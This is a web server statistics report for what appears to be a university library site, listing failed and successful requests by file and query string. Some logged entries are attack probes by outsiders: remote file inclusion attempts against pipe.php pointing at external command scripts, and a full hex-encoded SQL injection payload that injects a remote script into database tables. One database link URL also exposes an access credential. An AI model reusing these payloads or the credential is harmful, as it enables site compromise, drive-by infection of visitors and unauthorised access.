(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the files that caused failures, for example files not found.

Listing files with at least 250 failed requests, sorted by the number of failed requests.

reqsfile
26456/cgi-bin/eresources/images/image1on.png
26456/cgi-bin/eresources/images/image1off.png
22007/journals/images/image1off.png
22003/journals/images/image1on.png
21608/news/news.xml
9717/+menu.bgImageUp+
3600/guides/images/image1off.png
3597/guides/images/image1on.png
3540/departments/LISMS/mediaservices/
60  /departments/LISMS/mediaservices/?C=S;O=A
59  /departments/LISMS/mediaservices/?C=D;O=A
54  /departments/LISMS/mediaservices/?C=M;O=A
49  /departments/LISMS/mediaservices/?C=N;O=D
47  /departments/LISMS/mediaservices/?C=N;O=A
35  /departments/LISMS/mediaservices/?C=D;O=D
27  /departments/LISMS/mediaservices/?C=S;O=D
26  /departments/LISMS/mediaservices/?C=M;O=D
2623/vision/index.php
2393/lisps/access/specialservices/reserves/reserves.html
2316/cgi-bin/eresources/
2233/ALA Promo Graphic
2115/tlr/mediaservices/
1994/_vti_bin/owssvr.dll
857  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
440  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
299  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0
123  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6403&STRMVER=4&CAPREQ=0
113  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
47  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4219&STRMVER=4&CAPREQ=0
35  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=5606&STRMVER=4&CAPREQ=0
25  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518&STRMVER=4&CAPREQ=0
23  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6415&STRMVER=4&CAPREQ=0
17  /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=5207&STRMVER=4&CAPREQ=0
1965/MSOffice/cltreq.asp
849  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
433  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
296  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0
121  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6403&STRMVER=4&CAPREQ=0
113  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
46  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4219&STRMVER=4&CAPREQ=0
35  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=5606&STRMVER=4&CAPREQ=0
25  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518&STRMVER=4&CAPREQ=0
17  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=5207&STRMVER=4&CAPREQ=0
15  /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6415&STRMVER=4&CAPREQ=0
1815/journals/
1783/lisps/circulation/policies/
37  /lisps/circulation/policies/?C=M;O=A
26  /lisps/circulation/policies/?C=S;O=A
25  /lisps/circulation/policies/?C=D;O=A
24  /lisps/circulation/policies/?C=N;O=D
20  /lisps/circulation/policies/?C=N;O=A
18  /lisps/circulation/policies/?C=M;O=D
17  /lisps/circulation/policies/?C=D;O=D
16  /lisps/circulation/policies/?C=S;O=D
1703/cgi-bin/directory/
1683/cgi-bin/a2z/images/image1off.png
1681/cgi-bin/a2z/images/image1on.png
1636/lisas/positions/images/image1off.png
1635/lisas/positions/images/image1on.png
1585/cgi-bin/directory/images/image1on.png
1584/cgi-bin/directory/images/image1off.png
1442/journals/index.php
1293/eresources/images/image1on.png
1289/eresources/images/image1off.png
1258/lisars/
62  /lisars/?C=N;O=D
60  /lisars/?C=D;O=A
55  /lisars/?C=M;O=A
53  /lisars/?C=S;O=A
36  /lisars/?C=N;O=A
30  /lisars/?C=M;O=D
26  /lisars/?C=S;O=D
20  /lisars/?C=D;O=D
1220/directory/images/image1off.png
1219/directory/images/image1on.png
1206/units/
1185/internet/images/image1on.png
1184/internet/images/image1off.png
1138/journals/images/mmmenu4_278x28_up.gif
1130/tlr/mediaservices/images/image1on.png
1125/tlr/mediaservices/images/image1off.png
1062/units/orgchart.html
1048/news/newlibraryfeatures.html
1020/helpcenter/desks/images/image1off.png
1019/helpcenter/desks/images/image1on.png
989/units/images/image1on.png
983/units/images/image1off.png
955/lisps/access/specialservices/images/image1on.png
954/catalogs/images/image1on.png
952/catalogs/images/image1off.png
951/lisps/access/specialservices/images/image1off.png
948/lisas/positions/
902/services/positions.htm
888/schedules/images/image1off.png
888/schedules/images/image1on.png
879/journals/images/mmmenu3_227x24_up.gif
823/journals/images/mmmenu1_348x24_up.gif
813/journals/images/mmmenu2_159x24_up.gif
752/guides/subjects/images/image1off.png
751/guides/subjects/images/image1on.png
747/lisps/images/image1on.png
746/lisps/images/image1off.png
743/tlr/images/image1off.png
743/tlr/images/image1on.png
728/eresources/databases/images/image1on.png
727/eresources/databases/images/image1off.png
718/databases/
706/guides/researchingtopics.htm
690/departments/LISMS/mediaservices
661/tlr/mediaproductions/administration/exportet.html
660/helpcenter/inc/pipe.php
24  /helpcenter/inc/pipe.php?HCL_path=http://211.155.235.169/sewam/cmd.txt?
23  /helpcenter/inc/pipe.php?HCL_path=http://www.unkn0wn-xd.by.ru/id.txt?
19  /helpcenter/inc/pipe.php?HCL_path=http://claroline.lct-net.cl/id?
660/tlr/mediaproductions/administration/exportdu.html
657/help/
654/tlr/mediaproductions/administration/exportvt.html
649/helpcenter/images/image1off.png
649/helpcenter/images/image1on.png
646/guides/userguides.html
640/Templates/printing/journals/ejournals.html
639/lisps/govinfo/images/image1on.png
636/lisps/govinfo/images/image1off.png
631/medsvcs.htm
630/newlibfactsheet.htm
629/hours.htm
629/printing/magazines/
598/sguides/
26  /sguides/?C=N;O=A
26  /sguides/?C=N;O=D
22  /sguides/?C=D;O=A
21  /sguides/?C=M;O=A
17  /sguides/?C=S;O=A
14  /sguides/?C=S;O=D
12  /sguides/?C=M;O=D
11  /sguides/?C=D;O=D
593/ASRS/
591/schedules/index.shtml
588/crossdomain.xml
574/lisps/circulation/images/image1off.png
574/lisps/circulation/images/image1on.png
568/departments/
32  /departments/?C=N;O=A
32  /departments/?C=S;O=A
29  /departments/?C=M;O=A
29  /departments/?C=D;O=A
24  /departments/?C=N;O=D
13  /departments/?C=S;O=D
12  /departments/?C=D;O=D
10  /departments/?C=M;O=D
567/departments/LISMS/
43  /departments/LISMS/?C=S;O=A
43  /departments/LISMS/?C=D;O=A
41  /departments/LISMS/?C=M;O=A
32  /departments/LISMS/?C=N;O=D
31  /departments/LISMS/?C=N;O=A
21  /departments/LISMS/?C=M;O=D
20  /departments/LISMS/?C=D;O=D
17  /departments/LISMS/?C=S;O=D
537/lisps/ris/images/image1off.png
536/lisps/ris/images/image1on.png
532/eresources/chemistry.shtml
505/LISASC/
480/eresources/index.php
479/eresources/images/mmmenu4_314x28_up.gif
476/maps/images/image1on.png
475/maps/images/image1off.png
448/cgi-bin/use
447/eresources/images/mmmenu3_241x28_up.gif
447/lisps/access/specialservices/ill.html
440/eresources/images/mmmenu2_180x28_up.gif
438/policy/use.htm
428/services/
422/lisas/
418/eresources/images/mmmenu1_371x28_up.gif
416/xmlrpc.php
415/helpcenter/desks/helpcenter/inc/pipe.php
21  /helpcenter/desks/helpcenter/inc/pipe.php?HCL_path=http://211.155.235.169/sewam/cmd.txt?
18  /helpcenter/desks/helpcenter/inc/pipe.php?HCL_path=http://www.unkn0wn-xd.by.ru/id.txt?
13  /helpcenter/desks/helpcenter/inc/pipe.php?HCL_path=http://claroline.lct-net.cl/id?
414/cgi-bin/disclaimer
414/lisps/access/specialservices/reserves.html
412/schedules/
401/tools/
399/cgi-bin/eresources/eselect.py
375  /cgi-bin/eresources/eselect.py?title=All Databases
398/tlr/+menu.bgImageUp+
388/departments/LISMS/mediaservices/images/image1on.png
388/tools/catalogs.htm
384/vision/images/image1off.png
383/vision/images/image1on.png
382/lisps/ris/myaccount.html
380/services.htm
378/tools/internet.htm
375/departments/LISMS/mediaservices/images/image1off.png
357/lisps/govinfo/priorsite/
353/index.htm
352/guides/tutorials/glossary.html
352/eresources/
346/
339/tutorials/glossary.html
338/cdm4/index_uis_stdmsth.php
331  /cdm4/index_uis_stdmsth.php?CISOROOT=/uis_stdmsth
336/tutorials/images/image1off.png
336/tutorials/images/image1on.png
333/guides/tutorials/databasehowto.html
326/policy/rights.htm
326/guides/tutorials/
321/sguides/nursing.pdf
318/sguides/sociology.pdf
318/sguides/chemistry.pdf
317/eresources/CredoTitlesAlpha.xml
315/returning/media/
315/eresources/databases/chemistry.shtml
312/internet/images/mmmenu4_314x28_up.gif
308/sguides/religion.pdf
308/sguides/philosophy.pdf
308/robot.txt
307/sguides/business.pdf
306/news/newlibfactsheet.htm
306/sguides/biology.pdf
305/sguides/physics.pdf
303/news/cywayl.php
302/cgi-bin/a2z/
301/helpcenter/helpcenter/inc/pipe.php
23  /helpcenter/helpcenter/inc/pipe.php?HCL_path=http://211.155.235.169/sewam/cmd.txt?
13  /helpcenter/helpcenter/inc/pipe.php?HCL_path=http://claroline.lct-net.cl/id?
299/catalogs/index.php
295/acquisitions/images/image1on.png
295/acquisitions/images/image1off.png
294/helpcenter/desks.html
294/services/instruction.html
293/sguides/socialwork.pdf
292/cgi-bin/eresources/subject.py
53  /cgi-bin/eresources/subject.py?title=Pharmacy Databases&subject=pharmacy
50  /cgi-bin/eresources/subject.py?title=Education Databases&subject=education
41  /cgi-bin/eresources/subject.py?title=Psychology Databases&subject=psychology
27  /cgi-bin/eresources/subject.py?title=Health Sciences Databases&subject=healthsciences
21  /cgi-bin/eresources/subject.py?title=Business Databases&subject=business
14  /cgi-bin/eresources/subject.py?title=News and Current Events Databases&subject=news
14  /cgi-bin/eresources/subject.py?title=Criminal Justice Databases&subject=criminaljustice
12  /cgi-bin/eresources/subject.py?title=History Databases&subject=history
10  /cgi-bin/eresources/subject.py?title=Literature Databases&subject=literature
282/lisps/access/reserves/electronicreserves.html
278/lisps/myaccount.html
275/guides/subjects/AMERICANLITERATURE.pdf
273/lisars/locations/
36  /lisars/locations/?C=D;O=A
34  /lisars/locations/?C=S;O=A
33  /lisars/locations/?C=M;O=A
25  /lisars/locations/?C=N;O=D
23  /lisars/locations/?C=N;O=A
13  /lisars/locations/?C=D;O=D
12  /lisars/locations/?C=S;O=D
11  /lisars/locations/?C=M;O=D
273/lisps/ris/
271/tutorials/databasehowto.html
269/helpcenter/desks/ill.shtml
268/lisps/access/ill/faqs.html
266/news/images/image1off.png
266/news/images/image1on.png
263/eresources/faqs.html
261/helpcenter/desks/circulation.shtml
258/tlr/mediaproductions/
257/policy/disclaimer.htm
256/lists/images/image1on.png
256/lists/images/image1off.png
255/lisps/circulation/
252/guides/
250/eresources/galetitles.html
89798[not listed: 11,828 files]

Request Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the files on the site.

Listing files with at least 250 requests, sorted by the number of requests.

reqs%byteslast timefile
84060940.03%18/Aug/11 16:33/
1042 0.07%12/Apr/11 01:58  /?
95 0.01% 8/Sep/08 07:47  /?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
93 0.01% 8/Sep/08 07:36  /?;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
47  1/Jul/11 12:40  /?search2NAME=dissociative+disorders&search1ButtonNAME.x=15&search1ButtonNAME.y=12
15  6/Jul/11 16:41  /?search2NAME=abortion
14 28/Jul/11 14:26  /?search2NAME=psychology
13  4/May/11 18:21  /?search2NAME=jstor
13  5/May/11 12:27  /?search2NAME=ebsco&search1ButtonNAME.x=0&search1ButtonNAME.y=0
13 17/Jul/11 23:42  /?search2NAME=ebsco
13  3/Jul/11 20:40  /?search2NAME=immigration&search1ButtonNAME.x=25&search1ButtonNAME.y=6
11  5/Jul/08 18:49  /?source=http://alieandrann.net/id.txt???
11 16/Jun/11 15:34  /?search2NAME=psychology&search1ButtonNAME.x=0&search1ButtonNAME.y=0
11  5/Jul/08 18:49  /?source=http://www.geocities.com/luthercorp1/kngid.txt?
10 18/Jul/11 19:23  /?search2NAME=new+england+journal+of+medicine&search1ButtonNAME.x=0&search1ButtonNAME.y=0
10 27/Jun/11 09:33  /?search2NAME=autism&search1ButtonNAME.x=0&search1ButtonNAME.y=0
158781 4.48%18/Aug/11 14:51/cgi-bin/eresources/remoteinfo.py
10350 0.19%18/Aug/11 09:51  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h&databasename=Academic Search Complete
2927 0.06%18/Aug/11 13:24  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/&databasename=EBSCO databases
1813 0.04%16/Aug/11 11:47  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric&databasename=ERIC (EBSCO)
1658 0.03%12/Aug/11 14:02  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=rzh&databasename=CINAHL Plus with Full Text
1286 0.03%16/Aug/11 10:50  /cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&databasename=EBSCO AtoZ
1279 0.03% 5/Aug/11 18:32  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h&databasename=Academic Search Complete&&dbname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h
1264 0.02%16/Aug/11 09:27  /cgi-bin/eresources/remoteinfo.py?linkname=www.jstor.org/action/showAdvancedSearch&databasename=JSTOR
1202 0.03%27/May/11 22:41  /cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=aph&dbname=Academic Search Premier
993 0.02%12/Aug/11 17:51  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=pdh&databasename=PsycARTICLES
898 0.02% 5/Aug/11 13:31  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ehh&databasename=Education Research Complete
889 0.02%11/Aug/11 09:28  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=psyh&databasename=PsycINFO
789 0.01%16/Aug/11 07:48  /cgi-bin/eresources/remoteinfo.py?linkname=online.factsandcomparisons.com&databasename=Facts & Comparisons%C2%AE 4.0
699 0.01%18/Aug/11 10:06  /cgi-bin/eresources/remoteinfo.py?linkname=online.lexi.com&databasename=Lexi-Comp ONLINE
657 0.02%16/Aug/11 01:27  /cgi-bin/eresources/remoteinfo.py?linkname=www.artstor.org&databasename=ARTstor
580 0.02%16/Aug/11 07:36  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Newsbank
559 0.01% 7/Aug/11 03:03  /cgi-bin/eresources/remoteinfo.py?linkname=www.refworks.com&databasename=RefWorks
556 0.01% 8/Aug/11 06:52  /cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&databasename=African American Biographical Database
535 0.02%20/Jul/11 12:07  /cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=eric&dbname=ERIC (EBSCO)
532 0.02%27/May/11 15:47  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=aph&dbname=Academic Search Premier
517 0.01% 8/Aug/11 16:07  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP&databasename=Medline
509 0.01%14/Aug/11 19:44  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998&databasename=Criminal Justice Periodicals
500 0.01% 8/Aug/11 22:16  /cgi-bin/eresources/remoteinfo.py?linkname=www.search.eb.com/&databasename=Encyclopedia Britannica
496 0.01% 6/Aug/11 19:32  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=Lexis-Nexis Academic Universe - General
489 0.01% 8/Aug/11 16:06  /cgi-bin/eresources/remoteinfo.py?linkname=www.ncbi.nlm.nih.gov/pubmed/advanced&databasename=PubMed
483 0.01%13/Aug/11 01:06  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=bsh&databasename=Business Source Elite
479 0.01%17/Aug/11 10:37  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login&databasename=ProQuest Databases
472 0.01%16/Aug/11 13:20  /cgi-bin/eresources/remoteinfo.py?linkname=www.thomsonhc.com/home/dispatch&databasename=Thomson Reuters Healthcare
470 0.01%18/Aug/11 07:07  /cgi-bin/eresources/remoteinfo.py?linkname=www.jstor.org/action/showAdvancedSearch&databasename=JSTOR&&dbname=www.jstor.org/action/showAdvancedSearch
462 0.01% 7/Aug/11 01:01  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&databasename=ArticleFirst
460 0.01% 6/Aug/11 07:54  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/&databasename=EBSCO databases&&dbname=search.ebscohost.com/
449 0.01%12/Aug/11 21:13  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ahl&databasename=America: History and Life
447 0.01%20/Jun/11 19:29  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&dbname=ProQuest databases
425 0.01% 8/Aug/11 15:37  /cgi-bin/eresources/remoteinfo.py?linkname=www.medlineplus.gov&databasename=MEDLINE Plus
404 0.01% 5/Aug/11 17:09  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Chicago Sun Times
401 0.01% 8/Aug/11 08:36  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WorldCat;FSIP&databasename=WorldCat
401 0.01% 8/Aug/11 21:52  /cgi-bin/eresources/remoteinfo.py?linkname=www.csa.com/htbin/dbrng.cgi?username=cstateu9&access=cstateu9009&databasename=Physical Education Index
398 0.01% 7/Aug/11 05:01  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&databasename=ProQuest Education Journals
393 0.01% 5/Aug/11 18:11  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ECO;FSIP&databasename=ECO: OCLC list of scholarly journals
388 0.01% 6/Aug/11 10:49  /cgi-bin/eresources/remoteinfo.py?linkname=www.pubmedcentral.nih.gov/&databasename=PubMed Central
373 0.01%14/Aug/11 03:33  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Chicago Tribune
368 0.01% 5/Aug/11 06:04  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/psych&databasename=Annual Review of Psychology
363 0.01% 5/Aug/11 16:13  /cgi-bin/eresources/remoteinfo.py?linkname=www.xreferplus.com&databasename=Xreferplus
363 0.01% 5/Aug/10 15:50  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&databasename=Education Journals (ProQuest)
362 0.01%23/Jun/11 08:34  /cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/&dbname=EBSCO databases
359 0.01%17/Aug/11 15:54  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=mnh&databasename=MEDLINE with Full Text
356 0.01%20/Jul/11 18:40  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&databasename=ProQuest databases
340 0.01%20/Jun/11 15:22  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=ProQuest Education Journals
334 0.01% 8/Aug/11 02:12  /cgi-bin/eresources/remoteinfo.py?linkname=pubs.acs.org/&databasename=American Chemical Society Publications
333 0.01% 7/Jul/11 07:38  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=aph&databasename=Academic Search Premier
333 0.01% 5/Aug/11 14:20  /cgi-bin/eresources/remoteinfo.py?linkname=www.netlibrary.com/&databasename=NetLibrary
332 0.01%25/Jul/11 12:38  /cgi-bin/eresources/remoteinfo.py?linkname=scholar.google.com&databasename=Google Scholar
329 0.01%30/Jul/11 15:12  /cgi-bin/eresources/remoteinfo.py?linkname=www.liebertonline.com/&databasename=Mary Ann Liebert Health Science E-Journals
327 0.01%17/Aug/11 22:18  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=bsedata&defaultdb=bsh&databasename=Datamonitor Company Profiles
326 0.01% 8/Aug/11 20:24  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=sph&databasename=SPORTDiscus
326 0.01%20/Jun/11 14:52  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=Education Journals (ProQuest)
312 0.01%15/Aug/11 19:03  /cgi-bin/eresources/remoteinfo.py?linkname=www.collegesource.org/&databasename=Collegesource
312 0.01% 5/Aug/11 17:32  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/soc&databasename=Annual Review of Sociology
311 0.01% 5/Aug/11 06:03  /cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=nfh&databasename=Newspaper Source
311 0.01%17/Aug/11 12:07  /cgi-bin/eresources/remoteinfo.py?linkname=ChicagoStateUNI.naxosmusiclibrary.com&databasename=Naxos Music Library
310 0.01% 6/Aug/11 02:50  /cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=New York Times - Current
307 0.01% 9/Aug/11 00:40  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=GPO;FSIP&databasename=GPO
303 0.01%22/Jul/11 17:12  /cgi-bin/eresources/remoteinfo.py?linkname=gateway.ovid.com/ovidweb.cgi?T=JS&MODE=ovid&NEWS=n&PAGE=main&D=clre&databasename=NASW Clinical Register
303 0.01%14/Aug/11 18:44  /cgi-bin/eresources/remoteinfo.py?linkname=www.lib.niu.edu/ipo/&databasename=Illinois Periodicals Online
298 0.01%16/Aug/11 16:48  /cgi-bin/eresources/remoteinfo.py?linkname=www.ncbi.nlm.nih.gov/Literature/&databasename=NCBI (National Center for Biotechnology Information) Literature Databases
298 0.01% 5/Aug/11 14:15  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/publhealth&databasename=Annual Review of Public Health
296 0.01% 5/Aug/11 14:15  /cgi-bin/eresources/remoteinfo.py?linkname=www.els.net/&databasename=Encyclopedia of Life Sciences (ELS)
295 0.01%24/Jun/11 03:52  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=web.lexis-nexis.com/universe
294 0.01%27/May/11 22:06  /cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=Lexis-Nexis Academic Universe - Legal Research
294 0.01%30/Jul/11 08:11  /cgi-bin/eresources/remoteinfo.py?linkname=iimpft.chadwyck.com/&databasename=International Index To Music Periodicals
293 0.01%16/Aug/11 01:21  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/biophys&databasename=Annual Review of Biophysics
293 0.01%14/Aug/11 18:50  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/anthro&databasename=Annual Review of Anthropology
293 0.01% 5/Aug/11 16:05  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/med&databasename=Annual Review of Medicine
293 0.01%16/Jun/11 05:00  /cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&dbname=EBSCO AtoZ
292 0.01%16/Aug/11 02:54  /cgi-bin/eresources/remoteinfo.py?linkname=app.harpweek.com/&databasename=HarpWeek
291 0.01% 5/Aug/11 14:24  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=Proceedings;FSIP&databasename=Proceedings
291 0.01%19/Jul/11 10:27  /cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFBQ0Q@&clientId=45998&databasename=Historical New York Times
289 0.01%19/Jul/10 05:57  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ERIC;FSIP&databasename=ERIC (FirstSearch)
289 0.01% 5/Aug/11 14:19  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/toc/ecolsys/35/1&databasename=Annual Review of Ecology, Evolution, and Systematics
289 0.01%15/Aug/11 13:49  /cgi-bin/eresources/remoteinfo.py?linkname=www.kcdlonline.com/&databasename=Kraus Curriculum Development Library
287 0.01% 5/Aug/11 05:58  /cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/astro&databasename=Annual Review of Astronomy and Astrophysics
287 0.01% 2/Jul/11 08:42  /cgi-bin/eresources/remoteinfo.py?linkname=dictionary.oed.com/&databasename=Oxford English Dictionary
285 0.01%16/Aug/11 08:26  /cgi-bin/eresources/remoteinfo.py?linkname=classweb.loc.gov/Auto/&databasename=Library of Congress Classification Web
282 0.01% 5/Aug/11 13:58  /cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=PapersFirst;FSIP&databasename=PapersFirst
